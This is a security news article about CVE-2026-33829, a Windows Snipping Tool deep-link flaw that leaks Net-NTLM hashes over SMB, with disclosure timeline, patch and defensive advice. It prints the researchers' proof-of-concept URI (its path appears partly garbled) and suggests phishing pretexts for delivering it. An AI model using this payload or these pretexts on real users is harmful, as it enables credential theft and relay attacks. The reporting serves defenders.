A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage.
Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. Affected versions of the application register this deep link, which accepts a filePath parameter.
Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process.
The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.
Windows Snipping Tool PoC
Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI:
textms-screensketch:edit?&filePath=\file.png&isTemporary=false&saved=true&source=Toast When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.
What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.
An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.
The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background.
This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.
Patch Availability and Timeline
Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:
- March 23, 2026 — Vulnerability reported to Microsoft.
- April 14, 2026 — Microsoft releases a security patch.
- April 14, 2026 — Coordinated public advisory and PoC release.
Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.
Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
